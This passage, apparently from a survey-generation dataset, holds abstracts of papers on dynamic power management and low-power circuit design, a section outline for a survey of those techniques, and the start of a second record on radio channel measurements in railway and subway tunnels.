system, subject to a constraint on the power consumption, can be formulated as a stochastic optimization problem called policy optimization. Policy optimization can be solved exactly in polynomial time (in the number of states of the model). We implemented a policy optimization tool and tested the quality of the optimal policies on a realistic case study. --- paper_title: Dynamic power management based on continuous-time Markov decision processes paper_content: This paper introduces a continuous-time, controllable Markov process model of a power-managed system. The system model is composed of the corresponding stochastic models of the service queue and the service provider. The system environment is modeled by a stochastic service request process. The problem of dynamic power management in such a system is formulated as a policy optimization problem and solved using an efficient "policy iteration" algorithm. Compared to previous work on dynamic power management, our formulation allows better modeling of the various system components, the power-managed system as a whole, and its environment. In addition it captures dependencies between the service queue and service provider status. Finally, the resulting power management policy is asynchronous, hence it is more power-efficient and more useful in practice. Experimental results demonstrate the effectiveness of our policy optimization algorithm compared to a number of heuristic (time-out and N-policy) algorithms. --- paper_title: Event-driven power management of portable systems paper_content: The policy optimization problem for dynamic power management has received considerable attention in the recent past. We formulate policy optimization as a constrained optimization problem on continuous-time semi-Markov decision processes (SMDP). SMDPs generalize the stochastic optimization approach based on discrete-time Markov decision processes (DTMDP) presented in the earlier work by relaxing two limiting assumptions. In SMDPs, decisions are made at each event occurrence instead of at each discrete time interval as in DTMDP and thus saving power and giving higher performance. In addition, SMDPs can have general inter-state transition time distributions, allowing for greater generality and accuracy in modeling real-life systems where transition times between power states are not geometrically distributed. --- paper_title: Power considerations in the design of the Alpha 21264 microprocessor paper_content: Power dissipation is rapidly becoming a limiting factor in high performance microprocessor design due to ever increasing device counts and clock rates. The 21264 is a third generation Alpha microprocessor implementation, containing 15.2 million transistors and operating at 600 MHz. This paper describes some of the techniques the Alpha design team utilized to help manage power dissipation. In addition, the electrical design of the power, ground, and clock networks is presented. --- paper_title: PowerPC 603, a microprocessor for portable computers paper_content: The PowerPC 603 incorporates a variety of features to reduce power dissipation: dynamic idle-time shutdown of separate execution units, low-power cache design, and power considerations for standard cells, data-path elements, and clocking. System-level features include three software-programmable static power management modes and a hardware-programmable phase-lock loop. Operating at 80 MHz, the 603 typically dissipates 2.2 W, while achieving an estimated 75 Specint92 and 85 Specfp92. > --- paper_title: Gated clock routing minimizing the switched capacitance paper_content: This paper presents a zero-skew gated clock routing technique for VLSI circuits. The gated clock tree has masking gates at the internal nodes of the clock tree, which are selectively turned on and off by the gate control signals during the active and idle times of the circuit modules to reduce switched capacitance of the clock tree. This work extends our previous work so as to account for the switched capacitance and the area of the gate control signal routing. Various tradeoffs between power and area for different design options and module activities are discussed and detailed experimental results are presented. --- paper_title: Reducing switching activity on datapath buses with control-signal gating paper_content: This paper presents a technique for saving power dissipation in large datapaths by reducing unnecessary switching activity on buses. The focus of the technique is on achieving effective power savings with minimal overhead. When a bus is not going to be used in a datapath, it is held in a quiescent state by stopping the propagation of switching activity through the module(s) driving the bus. The "observability don't-care condition" of a bus is defined to detect unnecessary switching activity on the bus. This condition is used to gate control signals going to the bus-driver modules so that switching activity on the module inputs does not propagate to the bus. A methodology for automatically synthesizing gated control signals from the register transfer level description of a design is presented. The technique has very low area, delay, power, and designer effort overhead. It was applied to one of the integer execution units of a 64-bit, two-way superscalar RISC microprocessor. Experimental results from running various application programs on the microprocessor show an average of 26.6% reduction in dynamic switching power in the execution unit, with no increase in critical path delay and negligible area overhead. --- paper_title: Precomputation-based sequential logic optimization for low power paper_content: We address the problem of optimizing logic-level sequential circuits for low power. We present a powerful sequential logic optimization method that is based on selectively precomputing the output logic values of the circuit one clock cycle before they are required, and using the precomputed values to reduce internal switching activity in the succeeding clock cycle. We present two different precomputation architectures which exploit this observation. ::: We present an automatic method of synthesizing precomputational logic so as to achieve maximal reductions in power dissipation. We present experimental results on various sequential circuits. Up to 75% reductions in average switching activity and power dissipation are possible with marginal increases in circuit area and delay. --- paper_title: Adaptive hard disk power management on personal computers paper_content: Dynamic power management can be effective for designing low-power systems. In many systems, requests are clustered into sessions. This paper proposes an adaptive algorithm that can predict session lengths and shut down components between sessions to save power. Compared to other approaches, simulations show that this algorithm can reduce power consumption in hard disks with less impact on performance or reliability. --- paper_title: Design methodology of ultra low-power MPEG4 codec core exploiting voltage scaling techniques paper_content: This paper describes a fully automated low-power design methodology in which three different voltage-scaling techniques are combined together. Supply voltage is scaled globally, selectively, and adaptively while keeping the performance. This methodology enabled us to design an MPEG4 codec core with 58% less power than the original in three week turn-around-time. --- paper_title: A low-voltage CMOS DC-DC converter for a portable battery-operated system paper_content: Motivated by emerging battery-operated applications that demand compact, lightweight, and highly efficient DC-DC power converters, a buck circuit is presented in which all active devices are integrated on a single chip using a standard 1.2 /spl mu/ CMOS process. The circuit delivers 750 mW at 1.5 V from a 6 V battery. To effectively eliminate switching loss at high operating frequencies, the power transistors achieve nearly ideal zero-voltage switching (ZVS) through an adjustable dead-time control scheme. The silicon area and power consumption of the gate-drive buffers are reduced with a tapering factor that minimizes short-circuit current and dynamic dissipation for a given technology and application. Measured results on a prototype IC indicate that on-chip losses at full load can be kept below 8% at 1 MHz. > --- paper_title: Automated low-power technique exploiting multiple supply voltages applied to a media processor paper_content: This paper describes an automated design technique to reduce power by making use of two supply voltages. The technique consists of structure synthesis, placement, and routing. The structure synthesizer clusters the gates off the critical paths so as to supply the reduced voltage to save power. The placement and routing tool assigns either the reduced voltage or the unreduced one to each row so as to minimize the area overhead. The reduced supply, voltage is also exploited in a clock tree to reduce power. Combining these techniques together, we applied it to a media processor chip. The combined technique reduced the power by 47% in random-logic modules and by 73% in the clock tree, while keeping the performance. --- paper_title: Data driven signal processing: an approach for energy efficient computing paper_content: The computational switching activity of digital CMOS circuits can be dynamically minimized by designing algorithms that exploit signal statistics. This results in processors that have time-varying power requirements and perform computation on demand. An approach is presented to minimize the energy dissipation per data sample in variable-load DSP systems by adaptively minimizing the power supply voltage for each sample using a variable switching speed processor. In general, using buffering and filtering, the computation can be spread over multiple samples averaging the workload and lowering energy further. It is also shown that four levels of voltage quantization combined with dithering is sufficient to closely emulate arbitrary voltage levels. --- paper_title: A 300 MIPS/W RISC core processor with variable supply-voltage scheme in variable threshold-voltage CMOS paper_content: A 300 MIPS/W RISC core processor with variable supply-voltage (VS) scheme in variable threshold-voltage CMOS (VTCMOS) is presented. Performance in MIPS/W can be improved by a factor of more than two with no modification in the RISC core except for substrate contacts for the VTCMOS. From a 3.3 V external power supply the VS scheme automatically generates minimum internal supply voltages which meet the demand on its operation frequency. --- paper_title: Monitoring system activity for OS-directed dynamic power management paper_content: Most work to date on power reduction has focused at the component level, not at the system level. In this paper, we propose a framework for describing the power behavior of system-level designs. The model consists of a set of resources, an environmental workload specification, and a power management policy , which serves as the heart of the system model. We map this model to a simulation-based framework to obtain an estimate of the system's power dissipation. Accompanying this, we propose an algorithm to optimize power management policies. The optimization algorithm can be used in a tight loop with the estimation engine to derive new power-management policy algorithms for a given system-level description. We tested our approach by applying it to a real-life low-power portable design, achieving a power estimation accuracy of ∼10%, and a 23% reduction in power after policy optimization. --- paper_title: Quantitative comparison of power management algorithms paper_content: Dynamic power management saves power by shutting down idle devices. Several management algorithms have been proposed and demonstrated to be effective in certain applications. We quantitatively compare the power saving and performance impact of these algorithms on hard disks of a desktop and notebook computers. This paper has three contributions. First, we build a framework in Windows NT to implement power managers running realistic workloads and directly interacting with users. Second, we define performance degradation that reflects user perception. Finally, we compare power saving and performance of existing algorithms and analyze the difference. --- paper_title: Software controlled power management paper_content: Reducing power consumption is critical in many system designs. Dynamic power management is an effective approach to decrease power without significantly degrading performance. Power management decisions can be implemented in either hardware or software. A recent trend on personal computers is to use software to change hardware power states. This paper presents a software architecture that allows system designers to investigate power management algorithms in a systematic fashion through a template. The architecture exploits the Advanced Configuration and Power Interface (ACPI), a standard for hardware and software. We implement two algorithms for controlling the power states of a hard disk on a personal computer running Microsoft Windows. By measuring the current feeding the hard disk, we show that the algorithms can save up to 25% more energy than the Windows power manager. Our work has two major contributions: a template for software-controlled power management and experimental comparisons of management algorithms for a hard disk. --- paper_title: System-level power estimation and optimization paper_content: Most work to date on power reduction has focused at the component level, not at the system level. In this paper, we propose a framework for describing the power behavior of system-level designs. The model consists of a set of resources, an environmental workload specification, and a power management policy, which serves as the heart of the system model. We map this model to a simulation-based framework to obtain an estimate of the system's power dissipation. Accompanying this, we propose an algorithm to optimize power management policies. The optimization algorithm can be used in a tight loop with the estimation engine to derive new power-management policy algorithms for a given system-level description. We tested our approach by applying it to a real-life low-power portable design, achieving a power estimation accuracy of /spl sim/10%, and a 23% reduction in power after policy optimization. ---
Title: A Survey of Design Techniques for System-Level Dynamic Power Management Section 1: Introduction Description 1: Introduce the significance of high performance and low-power consumption in electronic circuits and system designs. Section 2: Modeling Power-Managed Systems Description 2: Explain how power-managed systems are modeled, focusing on the interaction between power-manageable components (PMC's) and power managers (PM's). Section 3: Dynamic Power Management Techniques Description 3: Discuss various techniques for controlling the power state of a system and its components, including predictive and stochastic control methods. Section 4: Implementation of Dynamic Power Management Description 4: Describe how different DPM schemes are implemented in circuits and systems, focusing on the infrastructure that enables complex power management policies. Section 5: Conclusion Description 5: Summarize the significance of DPM in reducing power consumption and the challenges involved in designing power management policies.
Channel measurements and models for high-speed train wireless communication systems in tunnel scenarios: a survey
12
--- paper_title: Cellular architecture and key technologies for 5G wireless communication networks paper_content: The fourth generation wireless communication systems have been deployed or are soon to be deployed in many countries. However, with an explosion of wireless mobile devices and services, there are still some challenges that cannot be accommodated even by 4G, such as the spectrum crisis and high energy consumption. Wireless system designers have been facing the continuously increasing demand for high data rates and mobility required by new wireless applications and therefore have started research on fifth generation wireless systems that are expected to be deployed beyond 2020. In this article, we propose a potential cellular architecture that separates indoor and outdoor scenarios, and discuss various promising technologies for 5G wireless communication systems, such as massive MIMO, energy-efficient communications, cognitive radio networks, and visible light communications. Future challenges facing these potential technologies are also discussed. --- paper_title: Measurements and Modeling of Distributed Antenna Systems in Railway Tunnels paper_content: This paper covers some of the work carried out in the planning of the global system for mobile communication for railway (GSM-R) of the tunnels on the new high-speed trains in Spain. Solutions based on distributed antenna systems have been tested by installing several 900-MHz transmitters inside and outside of a 4000-m tunnel and measuring the propagation in different conditions. The measurements have been used to model the effects of tunnel propagation, including curves, trains passing from the outside to the inside, and the effect of two trains passing inside the tunnel. All cases have been tested by comparing solutions using isofrequency and multifrequency distributed transmitters inside the tunnel. The improvements of signal-to-noise ratio and the reduction of the blocking effects of two trains passing have demonstrated the advantages of using isofrequency distributed antenna systems in tunnels. Finally, a complete propagation model combining both modal analysis and ray tracing has been applied to predict the propagation loss inside and outside these tunnels, and results have been compared with the measurements. The model has proven to be very useful for radio planning in new railway networks. --- paper_title: Radio channel measurements and analysis at 2.4/5GHz in subway tunnels paper_content: There is an increasing demand on wireless communications in subway tunnels to provide video surveillance and sensory data for security, maintenance and train control, and to offer various communication or entertainment services (e.g., Internet, etc.) to passengers as well. The wireless channel in tunnels is quite unique due to the confined space and the waveguide effects. Therefore, modeling the radio channel characteristics in tunnels is critically important for communication systems design or optimization. This paper investigates the key radio channel characteristics of a subway tunnel at 2.4 GHz and 5 GHz, such as the path loss, root mean square (RMS) delay spread, channel stationarity, Doppler shift, and channel capacity. The field measurements show that channel characteristics in tunnels are highly location-dependent and there exist abundant components in Doppler shift domain. In the straight section of the subway tunnel, the measured path loss exponents are close to 1.6, lower than that in free space. --- paper_title: Investigation on MIMO channels in subway tunnels paper_content: The purpose of this paper is to examine the possibilities of increasing the channel capacity in tunnels, and particularly in railway tunnels, due to the use of multiple-input-multiple-output techniques. Many measurement campaigns have been carried out, considering the complicated geometric structure of these tunnels. We determine the channel characteristics by making a statistical analysis of correlation matrices between antennas and singular values of the channel transfer matrix. A comparison between the theoretical and experimental results is also presented. A stochastic channel model is then proposed and validated. --- paper_title: Wideband radio channel measurements for train tunnels paper_content: We present and analyse the results of wideband radio channel measurements performed in tunnels. Both a high speed train tunnel and a smaller test tunnel have been investigated with both antennas and leaky feeders as fixed radiators. The results show typical features of the tunnel radio channel with typically low delay spread combined to significant slow fading of the LOS signal due to interferences. The delay spread may increase substantially during the fading dips. --- paper_title: Wideband analysis of large scale and small scale fading in tunnels paper_content: In this contribution, the analysis and the modeling of the large scale and small scale fading statistics in a semicircular tunnel is presented. The results are based on experimental data obtained during an extensive measurement campaign in the 2.8 - 5 GHz frequency range. Lastly, a simple model to characterize the statistics of the received signal in tunnels is presented. --- paper_title: An Empirical Random-Cluster Model for Subway Channels Based on Passive Measurements in UMTS paper_content: Recently, a measurement campaign for characterizing the channels in underground subway environments was conducted in Shanghai, China. Downlink signals transmitted by 46 universal mobile telecommunication system cells deployed along a 34-km-long subway were collected. Channel impulse responses are extracted from the data received in the common pilot channels, based on which parameters of multipath components are estimated by using a high-resolution parameter algorithm derived using the space-alternating generalized expectation-maximization principle. Multiple time-evolving clusters are obtained, each representing the channel from a remote-radio-unit of a base station to the receiver. Based on a total of 98 time-evolving clusters, channels observed in the station scenario and the tunnel scenario are modeled separately for their distinctive behaviors in many aspects, particularly in the variations of clusters’ trajectories. Intracluster characteristics parameterized by cluster delay and Doppler frequency spreads, $K$ -factor, and dependences among these parameters are investigated. Intercluster parameters, including coexisting cluster number, delay offset, power offset, and cross correlations, are investigated for the station scenario. A path loss model is established for the tunnel scenario. --- paper_title: Characterization of Angular Spread in Underground Tunnels Based on the Multimode Waveguide Model paper_content: One of the biggest challenges facing wireless designers is determining how to configure multiple-input–multiple-output (MIMO) antennas in underground-environments, such as mines, so that they deliver best performance. Here, we showed that angular dispersion of the signal, a phenomenon that greatly impacts channel capacity, can be accurately predicted in both near-field and far-field of underground tunnels using a multimode waveguide. Not only this analytical model is much faster than other methods, but also it does not have other shortcomings of measurement-based modeling (e.g., poor resolution for far distances in the tunnel). Further, we characterized angular-spread for different tunnel sizes and showed that the power-azimuth-spectrum can be modeled by a zero-mean Gaussian distribution whose standard-deviation (angular-spread) is dependent on the tunnel dimension and the transmitter-receiver distance. Angular-spread is found to be a decreasing function of axial distance. After a certain distance, it becomes very small (about 4 $^{\circ}$ ) and independent of tunnel transverse dimension. Our results are useful for design of MIMO systems in underground tunnels and sufficient to permit the correlation-matrix required to extend the IEEE 802.11n MIMO channel model to underground environments. --- paper_title: Effect of Antenna Position and Polarization on UWB Propagation Channel in Underground Mines and Tunnels paper_content: Radio propagation in confined spaces is consequent upon reflections by the boundaries. In such cases, the relative position and polarization of antennas becomes important. This paper investigates the effect of antenna position and polarization on ultra-wideband radio propagation in underground mines and tunnels. Analysis is based on channel measurements, over 2.4 to 4 GHz frequency band, in three tunnels of varying cross-sectional dimensions and lengths. Effects of mounting antennas on ceiling versus walls and horizontal versus vertical polarization are compared in terms of path loss and time dispersion. Results show that average path loss is more sensitive to antenna position and polarization, than is time dispersion. The effect of polarization is found to be dependent upon antenna position. Horizontal polarization results in less average path loss when the antennas are mounted close to the ceiling, whereas vertical polarization results in less average loss when mounted close to a side wall. It is demonstrated that carefully considering antenna position and polarization can result in more efficient and cost-effective deployment of UWB systems in underground environments. --- paper_title: Broadband radio communications in subway stations and tunnels paper_content: Broadband radio communication systems are very important for railway traffic control systems and passengers network services. Nowadays, even though 4G LTE (Long Term Evolution) has deployed for commercial use with excellent results in open areas, it is still lack of knowledge regarding to how such broadband signals propagate inside complex environments with many complex structures that affect propagation such as subway tunnels and stations. For this reason, the aim of the presented measurements in this paper is to model the response of the broadband channel at 1000 MHz and 2450 MHz in the subway environments. These measurements focus on three types of scenarios: subway stations, straight tunnels and a train effect the signal. The results provide detailed information about the propagation channel, which can be useful to develop a broadband propagation model for underground communication systems. --- paper_title: Measurement and statistical analysis of 1.89GHz radio propagation in a realistic mountain tunnel paper_content: Accurate characterization of the radio channel in tunnels is of great importance for vehicle control communications systems. For the purpose of modeling characterizations of this special environment, actual measurements have been carried out at 1.89GHz in Shidao Mountain Highway Tunnel environment. During the measurements, a base station transmitters and a mobile receiver was installed in the tunnel and on a testing car respectively. With an optimum antenna configuration, main propagation characteristics of a complex mountain tunnel environment, including path loss, shadow fading, fast fading, level crossing rate (LCR) and average fade duration (AFD), have been measured and computed. All analysis results have been shown in a complete table for deepening the insight into the propagation mechanism within tunnel environments. --- paper_title: Measurements of the propagation of UHF radio waves on an underground railway train paper_content: Measurements of the natural propagation of UHF radio waves on an underground train are reported. Of prime interest are the natural propagation attenuation and the median signal level behavior. The propagation attenuation rates or the median signal level behaviors are found to correlate with the train carriages and frequency. On the front carriage, the propagation attenuation rate is 54 dB/100 m at 465 MHz and reduced to 21 dB/100 m at 820 MHz. However, on the rear carriage, it becomes 14.8 dB/100 m at 465 MHz and 7.8 dB/100 m at 820 MHz. It is shown that higher frequency is beneficial to the natural propagation and the train body greatly affects the natural propagation. Furthermore, the values of the path loss exponent are also given. --- paper_title: Broadband Channel Long Delay Cluster Measurements and Analysis at 2.4GHz in Subway Tunnels paper_content: The delay caused by the reflected ray in broadband communication has a great influence on the communications in subway tunnel. This paper presents measurements taken in subway tunnels at 2.4 GHz, with 5 MHz bandwidth. According to propagation characteristics of tunnel, the measurements were carried out with a frequency domain channel sounding technique, in three typical scenarios: line of sight (LOS), Non-line-of-sight (NLOS) and far line of sight (FLOS), which lead to different delay distributions. Firstly IFFT was chosen to get channel impulse response (CIR) h(t) from measured three-dimensional transfer functions. Power delay profile (PDP) was investigated to give an overview of broadband channel model. Thereafter, a long delay caused by the obturation of tunnel is observed and investigated in all the scenarios. The measurements show that the reflection can be greatly remained by the tunnel, which leads to long delay cluster where the reflection, but direct ray, makes the main contribution for radio wave propagation. Four important parameters: distribution of whole PDP power, first peak arriving time, reflection cluster duration and PDP power distribution of reflection cluster were studied to give a detailed description of long delay characteristic in tunnel. This can be used to ensure high capacity communication in tunnels. --- paper_title: Measurement of Distributed Antenna Systems at 2.4 GHz in a Realistic Subway Tunnel Environment paper_content: Accurate characterization of the radio channel in tunnels is of great importance for new signaling and train control communications systems. To model this environment, measurements have been taken at 2.4 GHz in a real environment in Madrid subway. The measurements were carried out with four base station transmitters installed in a 2-km tunnel and using a mobile receiver installed on a standard train. First, with an optimum antenna configuration, all the propagation characteristics of a complex subway environment, including near shadowing, path loss, shadow fading, fast fading, level crossing rate (LCR), and average fade duration (AFD), have been measured and computed. Thereafter, comparisons of propagation characteristics in a double-track tunnel (9.8-m width) and a single-track tunnel (4.8-m width) have been made. Finally, all the measurement results have been shown in a complete table for accurate statistical modeling. --- paper_title: On the Possibility of Interpreting Field Variations and Polarization in Arched Tunnels Using a Model for Propagation in Rectangular or Circular Tunnels paper_content: We investigate the possibility of using the modal theory of the electromagnetic propagation in rectangular or circular tunnels, to satisfactorily interpret experimental results, including polarization, in arched tunnels. This study is based on extensive measurement campaigns carried out in the 450 MHz-5 GHz frequency range. --- paper_title: Analysis of radio wave propagation characteristics in rectangular road tunnel at 800 MHz and 2.4 GHz paper_content: We analyze radio wave propagation characteristics in tunnel using simulations by ray-tracing method and measurements for a newly constructed tunnel in Korea. As the simulation results using direct wave and 25 reflected waves and the measurement ones against the 14.7 meters wide, and 6.15 meters high, and 365 meters long tunnel is similar to each other, the radio wave propagation model for predicting received power in the tunnel can be applied to the other tunnels. --- paper_title: Measurements and Modeling of Distributed Antenna Systems in Railway Tunnels paper_content: This paper covers some of the work carried out in the planning of the global system for mobile communication for railway (GSM-R) of the tunnels on the new high-speed trains in Spain. Solutions based on distributed antenna systems have been tested by installing several 900-MHz transmitters inside and outside of a 4000-m tunnel and measuring the propagation in different conditions. The measurements have been used to model the effects of tunnel propagation, including curves, trains passing from the outside to the inside, and the effect of two trains passing inside the tunnel. All cases have been tested by comparing solutions using isofrequency and multifrequency distributed transmitters inside the tunnel. The improvements of signal-to-noise ratio and the reduction of the blocking effects of two trains passing have demonstrated the advantages of using isofrequency distributed antenna systems in tunnels. Finally, a complete propagation model combining both modal analysis and ray tracing has been applied to predict the propagation loss inside and outside these tunnels, and results have been compared with the measurements. The model has proven to be very useful for radio planning in new railway networks. --- paper_title: Investigation on MIMO channels in subway tunnels paper_content: The purpose of this paper is to examine the possibilities of increasing the channel capacity in tunnels, and particularly in railway tunnels, due to the use of multiple-input-multiple-output techniques. Many measurement campaigns have been carried out, considering the complicated geometric structure of these tunnels. We determine the channel characteristics by making a statistical analysis of correlation matrices between antennas and singular values of the channel transfer matrix. A comparison between the theoretical and experimental results is also presented. A stochastic channel model is then proposed and validated. --- paper_title: Wideband analysis of large scale and small scale fading in tunnels paper_content: In this contribution, the analysis and the modeling of the large scale and small scale fading statistics in a semicircular tunnel is presented. The results are based on experimental data obtained during an extensive measurement campaign in the 2.8 - 5 GHz frequency range. Lastly, a simple model to characterize the statistics of the received signal in tunnels is presented. --- paper_title: An Empirical Random-Cluster Model for Subway Channels Based on Passive Measurements in UMTS paper_content: Recently, a measurement campaign for characterizing the channels in underground subway environments was conducted in Shanghai, China. Downlink signals transmitted by 46 universal mobile telecommunication system cells deployed along a 34-km-long subway were collected. Channel impulse responses are extracted from the data received in the common pilot channels, based on which parameters of multipath components are estimated by using a high-resolution parameter algorithm derived using the space-alternating generalized expectation-maximization principle. Multiple time-evolving clusters are obtained, each representing the channel from a remote-radio-unit of a base station to the receiver. Based on a total of 98 time-evolving clusters, channels observed in the station scenario and the tunnel scenario are modeled separately for their distinctive behaviors in many aspects, particularly in the variations of clusters’ trajectories. Intracluster characteristics parameterized by cluster delay and Doppler frequency spreads, $K$ -factor, and dependences among these parameters are investigated. Intercluster parameters, including coexisting cluster number, delay offset, power offset, and cross correlations, are investigated for the station scenario. A path loss model is established for the tunnel scenario. --- paper_title: Broadband radio communications in subway stations and tunnels paper_content: Broadband radio communication systems are very important for railway traffic control systems and passengers network services. Nowadays, even though 4G LTE (Long Term Evolution) has deployed for commercial use with excellent results in open areas, it is still lack of knowledge regarding to how such broadband signals propagate inside complex environments with many complex structures that affect propagation such as subway tunnels and stations. For this reason, the aim of the presented measurements in this paper is to model the response of the broadband channel at 1000 MHz and 2450 MHz in the subway environments. These measurements focus on three types of scenarios: subway stations, straight tunnels and a train effect the signal. The results provide detailed information about the propagation channel, which can be useful to develop a broadband propagation model for underground communication systems. --- paper_title: Measurement and statistical analysis of 1.89GHz radio propagation in a realistic mountain tunnel paper_content: Accurate characterization of the radio channel in tunnels is of great importance for vehicle control communications systems. For the purpose of modeling characterizations of this special environment, actual measurements have been carried out at 1.89GHz in Shidao Mountain Highway Tunnel environment. During the measurements, a base station transmitters and a mobile receiver was installed in the tunnel and on a testing car respectively. With an optimum antenna configuration, main propagation characteristics of a complex mountain tunnel environment, including path loss, shadow fading, fast fading, level crossing rate (LCR) and average fade duration (AFD), have been measured and computed. All analysis results have been shown in a complete table for deepening the insight into the propagation mechanism within tunnel environments. --- paper_title: Broadband Channel Long Delay Cluster Measurements and Analysis at 2.4GHz in Subway Tunnels paper_content: The delay caused by the reflected ray in broadband communication has a great influence on the communications in subway tunnel. This paper presents measurements taken in subway tunnels at 2.4 GHz, with 5 MHz bandwidth. According to propagation characteristics of tunnel, the measurements were carried out with a frequency domain channel sounding technique, in three typical scenarios: line of sight (LOS), Non-line-of-sight (NLOS) and far line of sight (FLOS), which lead to different delay distributions. Firstly IFFT was chosen to get channel impulse response (CIR) h(t) from measured three-dimensional transfer functions. Power delay profile (PDP) was investigated to give an overview of broadband channel model. Thereafter, a long delay caused by the obturation of tunnel is observed and investigated in all the scenarios. The measurements show that the reflection can be greatly remained by the tunnel, which leads to long delay cluster where the reflection, but direct ray, makes the main contribution for radio wave propagation. Four important parameters: distribution of whole PDP power, first peak arriving time, reflection cluster duration and PDP power distribution of reflection cluster were studied to give a detailed description of long delay characteristic in tunnel. This can be used to ensure high capacity communication in tunnels. --- paper_title: Measurement of Distributed Antenna Systems at 2.4 GHz in a Realistic Subway Tunnel Environment paper_content: Accurate characterization of the radio channel in tunnels is of great importance for new signaling and train control communications systems. To model this environment, measurements have been taken at 2.4 GHz in a real environment in Madrid subway. The measurements were carried out with four base station transmitters installed in a 2-km tunnel and using a mobile receiver installed on a standard train. First, with an optimum antenna configuration, all the propagation characteristics of a complex subway environment, including near shadowing, path loss, shadow fading, fast fading, level crossing rate (LCR), and average fade duration (AFD), have been measured and computed. Thereafter, comparisons of propagation characteristics in a double-track tunnel (9.8-m width) and a single-track tunnel (4.8-m width) have been made. Finally, all the measurement results have been shown in a complete table for accurate statistical modeling. --- paper_title: Four-slope channel model for path loss prediction in tunnels at 400 MHz paper_content: The present study analyses radio propagation at the 400 MHz frequency band inside road and railway tunnels. It proposes, on the basis of field measurements, a path loss model consisting of four segments, namely: the free space segment, the high path loss segment, the waveguide segment and, in the furthest region, the free space propagation segment. Free space propagation is characteristic in a region close to an antenna. In the next region, the near region, only a few reflected rays reach the receiver resulting in high path loss. Further away, in the far region, the waveguide effect occurs because of a set of waves reflected from the tunnel walls resulting in low path loss. In the extreme far region, the waveguide effect vanishes because of attenuation of reflected rays. The points separating the individual segments are analytically defined. Model applicability and accuracy are checked by calculating the mean error and standard deviation. The results indicate reasonable agreement between measurements and the model. This four-slope path loss channel model can be applied for rapid and simple coverage prediction of direct mode operation in TETRA systems. --- paper_title: Measurement Analysis and Channel Modeling for TOA-Based Ranging in Tunnels paper_content: A robust and accurate positioning solution is required to increase the safety in GPS-denied environments. Although there is a lot of available research in this area, little has been done for confined environments such as tunnels. Therefore, we organized a measurement campaign in a basement tunnel of Linkoping university, in which we obtained ultra-wideband (UWB) complex impulse responses for line-of-sight (LOS), and three non-LOS (NLOS) scenarios. This paper is focused on time-of-arrival (TOA) ranging since this technique can provide the most accurate range estimates, which are required for range-based positioning. We describe the measurement setup and procedure, select the threshold for TOA estimation, analyze the channel propagation parameters obtained from the power delay profile (PDP), and provide statistical model for ranging. According to our results, the rise-time should be used for NLOS identification, and the maximum excess delay should be used for NLOS error mitigation. However, the NLOS condition cannot be perfectly determined, so the distance likelihood has to be represented in a Gaussian mixture form. We also compared these results with measurements from a mine tunnel, and found a similar behavior. --- paper_title: Measurement and Analysis of Extra Propagation Loss of Tunnel Curve paper_content: Wave propagation experiences extra loss in curved tunnels, which is highly desired for network planning. Extensive narrow-band propagation measurements are made in two types of Madrid subway tunnels (different cross sections and curvatures) with various configurations (different frequencies and polarizations). A ray tracer validated by the straight and curved parts of the measuring tunnels is employed to simulate the reference received signal power by assuming the curved tunnel to be straight. By subtracting the measured received power in the curved tunnels from the simulated reference power, the extra loss resulting from the tunnel curve is extracted. Finally, this paper presents the figures and tables quantitatively reflecting the correlations between the extra loss and radius of curvature, frequency, polarization, and cross section, respectively. The results are valuable for statistical modeling and the involvement of the extra loss in the design and network planning of communication systems in subway tunnels. --- paper_title: Wideband analysis of large scale and small scale fading in tunnels paper_content: In this contribution, the analysis and the modeling of the large scale and small scale fading statistics in a semicircular tunnel is presented. The results are based on experimental data obtained during an extensive measurement campaign in the 2.8 - 5 GHz frequency range. Lastly, a simple model to characterize the statistics of the received signal in tunnels is presented. --- paper_title: An Empirical Random-Cluster Model for Subway Channels Based on Passive Measurements in UMTS paper_content: Recently, a measurement campaign for characterizing the channels in underground subway environments was conducted in Shanghai, China. Downlink signals transmitted by 46 universal mobile telecommunication system cells deployed along a 34-km-long subway were collected. Channel impulse responses are extracted from the data received in the common pilot channels, based on which parameters of multipath components are estimated by using a high-resolution parameter algorithm derived using the space-alternating generalized expectation-maximization principle. Multiple time-evolving clusters are obtained, each representing the channel from a remote-radio-unit of a base station to the receiver. Based on a total of 98 time-evolving clusters, channels observed in the station scenario and the tunnel scenario are modeled separately for their distinctive behaviors in many aspects, particularly in the variations of clusters’ trajectories. Intracluster characteristics parameterized by cluster delay and Doppler frequency spreads, $K$ -factor, and dependences among these parameters are investigated. Intercluster parameters, including coexisting cluster number, delay offset, power offset, and cross correlations, are investigated for the station scenario. A path loss model is established for the tunnel scenario. --- paper_title: Effect of Antenna Position and Polarization on UWB Propagation Channel in Underground Mines and Tunnels paper_content: Radio propagation in confined spaces is consequent upon reflections by the boundaries. In such cases, the relative position and polarization of antennas becomes important. This paper investigates the effect of antenna position and polarization on ultra-wideband radio propagation in underground mines and tunnels. Analysis is based on channel measurements, over 2.4 to 4 GHz frequency band, in three tunnels of varying cross-sectional dimensions and lengths. Effects of mounting antennas on ceiling versus walls and horizontal versus vertical polarization are compared in terms of path loss and time dispersion. Results show that average path loss is more sensitive to antenna position and polarization, than is time dispersion. The effect of polarization is found to be dependent upon antenna position. Horizontal polarization results in less average path loss when the antennas are mounted close to the ceiling, whereas vertical polarization results in less average loss when mounted close to a side wall. It is demonstrated that carefully considering antenna position and polarization can result in more efficient and cost-effective deployment of UWB systems in underground environments. --- paper_title: Path loss modeling and fading analysis for channels with various antenna setups in tunnels at 30 GHz band paper_content: The high-speed railway (HSR) environment has unique characteristics in radio propagation. The research on radio channel in HSR plays a vital role in system design, especially for advanced mobile systems working in the millimetre-wave band. This paper presents the simulation in a typical straight and arched tunnel at 30 GHz band with a verified ray-tracing tool. The simulation results illustrate that the advanced mobile communication system with high gain directional antennas can support longer than 1 km communication links in the tunnel. In this paper, the channel characteristics of three different antenna setups are compared at frequencies ranging from 31.5 GHz∼33.5 GHz, e.g., path loss exponent, autocorrelation and decorrelation distance of shadow fading, etc. Additionally, these characteristics will be shown with statistic values that can easily reproduce the radio channel properties. Furthermore, the results will be utilized to guide further realistic measurement campaign and physical layer design for advanced mobile communication systems. --- paper_title: Measurements of the propagation of UHF radio waves on an underground railway train paper_content: Measurements of the natural propagation of UHF radio waves on an underground train are reported. Of prime interest are the natural propagation attenuation and the median signal level behavior. The propagation attenuation rates or the median signal level behaviors are found to correlate with the train carriages and frequency. On the front carriage, the propagation attenuation rate is 54 dB/100 m at 465 MHz and reduced to 21 dB/100 m at 820 MHz. However, on the rear carriage, it becomes 14.8 dB/100 m at 465 MHz and 7.8 dB/100 m at 820 MHz. It is shown that higher frequency is beneficial to the natural 